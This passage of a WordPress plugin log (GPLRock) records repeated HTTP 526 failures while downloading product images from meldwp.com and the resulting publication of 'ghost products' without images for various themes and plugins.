Error: . Retrying... [05-Apr-2026 11:35:57 UTC] GPLRock: Image download failed for product hungrybuzz-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:36:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hungrybuzz---restaurant-wordpress-theme-32675.webp for product hungrybuzz-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:36:00 UTC] GPLRock WARNING: Image download failed for product hungrybuzz-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hungrybuzz---restaurant-wordpress-theme-32675.webp [05-Apr-2026 11:36:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hungrybuzz-restaurant-wordpress-theme [05-Apr-2026 11:36:00 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:36:02 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:36:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/toyup---kids-toys-store-woocommerce-wordpress-theme-29338.webp for product toyup-kids-toys-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:36:04 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:36:06 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:30 UTC] GPLRock: Image download failed for product justfans-premium-content-creators-saas-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:32 UTC] GPLRock: Image download failed for product justfans-premium-content-creators-saas-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justfans---premium-content-creators-saas-platform-31451.webp for product justfans-premium-content-creators-saas-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:46:34 UTC] GPLRock: Image download failed for product justfans-premium-content-creators-saas-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:36 UTC] GPLRock: Image download failed for product justfans-premium-content-creators-saas-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justfans---premium-content-creators-saas-platform-31451.webp for product justfans-premium-content-creators-saas-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:46:38 UTC] GPLRock WARNING: Image download failed for product justfans-premium-content-creators-saas-platform. URL: https://meldwp.com/wp-content/uploads/justfans---premium-content-creators-saas-platform-31451.webp [05-Apr-2026 11:46:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: justfans-premium-content-creators-saas-platform [05-Apr-2026 11:46:38 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:41 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-floating-sliding-panel-29126.webp for product advanced-floating-sliding-panel after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:46:43 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:46:45 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:34 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:36 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stab-29060.webp for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:38 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:40 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stab-29060.webp for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:42 UTC] GPLRock WARNING: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion. URL: https://meldwp.com/wp-content/uploads/ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stab-29060.webp [05-Apr-2026 11:56:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion [05-Apr-2026 11:56:42 UTC] GPLRock: Image download failed for product karenderia-multiple-restaurant-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:44 UTC] GPLRock: Image download failed for product karenderia-multiple-restaurant-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/karenderia-multiple-restaurant-system-32389.webp for product karenderia-multiple-restaurant-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:46 UTC] GPLRock: Image download failed for product karenderia-multiple-restaurant-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:49 UTC] GPLRock: Image download failed for product karenderia-multiple-restaurant-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/karenderia-multiple-restaurant-system-32389.webp for product karenderia-multiple-restaurant-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:51 UTC] GPLRock WARNING: Image download failed for product karenderia-multiple-restaurant-system. URL: https://meldwp.com/wp-content/uploads/karenderia-multiple-restaurant-system-32389.webp [05-Apr-2026 11:56:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: karenderia-multiple-restaurant-system [05-Apr-2026 11:56:51 UTC] GPLRock: Image download failed for product smart-sms-email-manager-ssem (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:53 UTC] GPLRock: Image download failed for product smart-sms-email-manager-ssem (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-sms--email-manager-ssem-24641.webp for product smart-sms-email-manager-ssem after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:55 UTC] GPLRock: Image download failed for product smart-sms-email-manager-ssem (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:57 UTC] GPLRock: Image download failed for product smart-sms-email-manager-ssem (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:56:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smart-sms--email-manager-ssem-24641.webp for product smart-sms-email-manager-ssem after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:56:59 UTC] GPLRock WARNING: Image download failed for product smart-sms-email-manager-ssem. URL: https://meldwp.com/wp-content/uploads/smart-sms--email-manager-ssem-24641.webp [05-Apr-2026 11:56:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smart-sms-email-manager-ssem [05-Apr-2026 11:57:00 UTC] GPLRock: Image download failed for product photocluster-18-gallery-module-for-gmedia-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:02 UTC] GPLRock: Image download failed for product photocluster-18-gallery-module-for-gmedia-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photocluster-18--gallery-module-for-gmedia-plugin-11219.webp for product photocluster-18-gallery-module-for-gmedia-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:04 UTC] GPLRock: Image download failed for product photocluster-18-gallery-module-for-gmedia-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:06 UTC] GPLRock: Image download failed for product photocluster-18-gallery-module-for-gmedia-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/photocluster-18--gallery-module-for-gmedia-plugin-11219.webp for product photocluster-18-gallery-module-for-gmedia-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:08 UTC] GPLRock WARNING: Image download failed for product photocluster-18-gallery-module-for-gmedia-plugin. URL: https://meldwp.com/wp-content/uploads/photocluster-18--gallery-module-for-gmedia-plugin-11219.webp [05-Apr-2026 11:57:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: photocluster-18-gallery-module-for-gmedia-plugin [05-Apr-2026 11:57:08 UTC] GPLRock: Image download failed for product page-builder-by-azexo (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:10 UTC] GPLRock: Image download failed for product page-builder-by-azexo (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/page-builder-by-azexo-13147.webp for product page-builder-by-azexo after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:12 UTC] GPLRock: Image download failed for product page-builder-by-azexo (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:15 UTC] GPLRock: Image download failed for product page-builder-by-azexo (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/page-builder-by-azexo-13147.webp for product page-builder-by-azexo after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:17 UTC] GPLRock WARNING: Image download failed for product page-builder-by-azexo. URL: https://meldwp.com/wp-content/uploads/page-builder-by-azexo-13147.webp [05-Apr-2026 11:57:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: page-builder-by-azexo [05-Apr-2026 11:57:17 UTC] GPLRock: Image download failed for product vespia-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:19 UTC] GPLRock: Image download failed for product vespia-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vespia---creative-coming-soon-wordpress-plugin-25654.webp for product vespia-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:21 UTC] GPLRock: Image download failed for product vespia-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:23 UTC] GPLRock: Image download failed for product vespia-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vespia---creative-coming-soon-wordpress-plugin-25654.webp for product vespia-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:25 UTC] GPLRock WARNING: Image download failed for product vespia-creative-coming-soon-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/vespia---creative-coming-soon-wordpress-plugin-25654.webp [05-Apr-2026 11:57:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vespia-creative-coming-soon-wordpress-plugin [05-Apr-2026 11:57:26 UTC] GPLRock: Image download failed for product instagram-element-instagram-plugin-for-jquery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:28 UTC] GPLRock: Image download failed for product instagram-element-instagram-plugin-for-jquery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-element---instagram-plugin-for-jquery-17638.webp for product instagram-element-instagram-plugin-for-jquery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:30 UTC] GPLRock: Image download failed for product instagram-element-instagram-plugin-for-jquery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:32 UTC] GPLRock: Image download failed for product instagram-element-instagram-plugin-for-jquery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-element---instagram-plugin-for-jquery-17638.webp for product instagram-element-instagram-plugin-for-jquery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:34 UTC] GPLRock WARNING: Image download failed for product instagram-element-instagram-plugin-for-jquery. URL: https://meldwp.com/wp-content/uploads/instagram-element---instagram-plugin-for-jquery-17638.webp [05-Apr-2026 11:57:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: instagram-element-instagram-plugin-for-jquery [05-Apr-2026 11:57:34 UTC] GPLRock: Image download failed for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:36 UTC] GPLRock: Image download failed for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress-15854.webp for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:39 UTC] GPLRock: Image download failed for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:41 UTC] GPLRock: Image download failed for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress-15854.webp for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:43 UTC] GPLRock WARNING: Image download failed for product zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress-15854.webp [05-Apr-2026 11:57:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zoho-crm-integration-plugin-with-woocommerce-zoho-crm-plugin-for-wordpress [05-Apr-2026 11:57:43 UTC] GPLRock: Image download failed for product directories-pro-directory-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:45 UTC] GPLRock: Image download failed for product directories-pro-directory-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/directories-pro---directory-plugin-for-wordpress-2942.webp for product directories-pro-directory-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:47 UTC] GPLRock: Image download failed for product directories-pro-directory-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:49 UTC] GPLRock: Image download failed for product directories-pro-directory-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/directories-pro---directory-plugin-for-wordpress-2942.webp for product directories-pro-directory-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:51 UTC] GPLRock WARNING: Image download failed for product directories-pro-directory-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/directories-pro---directory-plugin-for-wordpress-2942.webp [05-Apr-2026 11:57:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: directories-pro-directory-plugin-for-wordpress [05-Apr-2026 11:57:52 UTC] GPLRock: Image download failed for product essential-pricing-plan-switcher-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:54 UTC] GPLRock: Image download failed for product essential-pricing-plan-switcher-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-pricing-plan-switcher-for-elementor-3648.webp for product essential-pricing-plan-switcher-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:57:56 UTC] GPLRock: Image download failed for product essential-pricing-plan-switcher-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:57:58 UTC] GPLRock: Image download failed for product essential-pricing-plan-switcher-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-pricing-plan-switcher-for-elementor-3648.webp for product essential-pricing-plan-switcher-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:00 UTC] GPLRock WARNING: Image download failed for product essential-pricing-plan-switcher-for-elementor. URL: https://meldwp.com/wp-content/uploads/essential-pricing-plan-switcher-for-elementor-3648.webp [05-Apr-2026 11:58:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essential-pricing-plan-switcher-for-elementor [05-Apr-2026 11:58:20 UTC] GPLRock: Image download failed for product woocommerce-tax-toggle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:22 UTC] GPLRock: Image download failed for product woocommerce-tax-toggle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tax-toggle-8430.webp for product woocommerce-tax-toggle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:24 UTC] GPLRock: Image download failed for product woocommerce-tax-toggle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:26 UTC] GPLRock: Image download failed for product woocommerce-tax-toggle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tax-toggle-8430.webp for product woocommerce-tax-toggle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:28 UTC] GPLRock WARNING: Image download failed for product woocommerce-tax-toggle. URL: https://meldwp.com/wp-content/uploads/woocommerce-tax-toggle-8430.webp [05-Apr-2026 11:58:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-tax-toggle [05-Apr-2026 11:58:28 UTC] GPLRock: Image download failed for product woocommerce-membership-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:30 UTC] GPLRock: Image download failed for product woocommerce-membership-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-membership-plugin-17072.webp for product woocommerce-membership-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:33 UTC] GPLRock: Image download failed for product woocommerce-membership-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:35 UTC] GPLRock: Image download failed for product woocommerce-membership-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-membership-plugin-17072.webp for product woocommerce-membership-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:37 UTC] GPLRock WARNING: Image download failed for product woocommerce-membership-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-membership-plugin-17072.webp [05-Apr-2026 11:58:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-membership-plugin [05-Apr-2026 11:58:37 UTC] GPLRock: Image downloaded successfully for product thumbnail-preview-and-item-grabber-wp-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1995edbb.webp [05-Apr-2026 11:58:37 UTC] GPLRock: Using pre-downloaded image for product thumbnail-preview-and-item-grabber-wp-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1995edbb.webp [05-Apr-2026 11:58:37 UTC] GPLRock: Ghost product published with image - Product ID: thumbnail-preview-and-item-grabber-wp-plugin [05-Apr-2026 11:58:37 UTC] GPLRock: Image download failed for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:39 UTC] GPLRock: Image download failed for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/limarquee---horizontal-and-vertical-scrolling-of-text-or-image-or-html-code-18995.webp for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:41 UTC] GPLRock: Image download failed for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:43 UTC] GPLRock: Image download failed for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/limarquee---horizontal-and-vertical-scrolling-of-text-or-image-or-html-code-18995.webp for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:46 UTC] GPLRock WARNING: Image download failed for product limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code. URL: https://meldwp.com/wp-content/uploads/limarquee---horizontal-and-vertical-scrolling-of-text-or-image-or-html-code-18995.webp [05-Apr-2026 11:58:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: limarquee-horizontal-and-vertical-scrolling-of-text-or-image-or-html-code [05-Apr-2026 11:58:46 UTC] GPLRock: Image download failed for product stripe-payment-add-on-for-bookpro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:48 UTC] GPLRock: Image download failed for product stripe-payment-add-on-for-bookpro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stripe-payment-add-on-for-bookpro-plugin-25199.webp for product stripe-payment-add-on-for-bookpro-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:50 UTC] GPLRock: Image download failed for product stripe-payment-add-on-for-bookpro-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:52 UTC] GPLRock: Image download failed for product stripe-payment-add-on-for-bookpro-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stripe-payment-add-on-for-bookpro-plugin-25199.webp for product stripe-payment-add-on-for-bookpro-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:54 UTC] GPLRock WARNING: Image download failed for product stripe-payment-add-on-for-bookpro-plugin. URL: https://meldwp.com/wp-content/uploads/stripe-payment-add-on-for-bookpro-plugin-25199.webp [05-Apr-2026 11:58:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stripe-payment-add-on-for-bookpro-plugin [05-Apr-2026 11:58:55 UTC] GPLRock: Image download failed for product irestora-plus-next-gen-restaurant-pos (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:57 UTC] GPLRock: Image download failed for product irestora-plus-next-gen-restaurant-pos (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:58:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/irestora-plus---next-gen-restaurant-pos-24735.webp for product irestora-plus-next-gen-restaurant-pos after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:58:59 UTC] GPLRock: Image download failed for product irestora-plus-next-gen-restaurant-pos (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:01 UTC] GPLRock: Image download failed for product irestora-plus-next-gen-restaurant-pos (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/irestora-plus---next-gen-restaurant-pos-24735.webp for product irestora-plus-next-gen-restaurant-pos after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:03 UTC] GPLRock WARNING: Image download failed for product irestora-plus-next-gen-restaurant-pos. URL: https://meldwp.com/wp-content/uploads/irestora-plus---next-gen-restaurant-pos-24735.webp [05-Apr-2026 11:59:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: irestora-plus-next-gen-restaurant-pos [05-Apr-2026 11:59:03 UTC] GPLRock: Image download failed for product age-verification-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:05 UTC] GPLRock: Image download failed for product age-verification-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/age-verification-for-wordpress-14146.webp for product age-verification-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:08 UTC] GPLRock: Image download failed for product age-verification-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:10 UTC] GPLRock: Image download failed for product age-verification-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/age-verification-for-wordpress-14146.webp for product age-verification-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:12 UTC] GPLRock WARNING: Image download failed for product age-verification-for-wordpress. URL: https://meldwp.com/wp-content/uploads/age-verification-for-wordpress-14146.webp [05-Apr-2026 11:59:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: age-verification-for-wordpress [05-Apr-2026 11:59:12 UTC] GPLRock: Image download failed for product elementor-addon-for-real-3d-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:14 UTC] GPLRock: Image download failed for product elementor-addon-for-real-3d-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-addon-for-real-3d-flipbook-27098.webp for product elementor-addon-for-real-3d-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:16 UTC] GPLRock: Image download failed for product elementor-addon-for-real-3d-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:18 UTC] GPLRock: Image download failed for product elementor-addon-for-real-3d-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:59:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-addon-for-real-3d-flipbook-27098.webp for product elementor-addon-for-real-3d-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:59:20 UTC] GPLRock WARNING: Image download failed for product elementor-addon-for-real-3d-flipbook. URL: https://meldwp.com/wp-content/uploads/elementor-addon-for-real-3d-flipbook-27098.webp [05-Apr-2026 11:59:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-addon-for-real-3d-flipbook 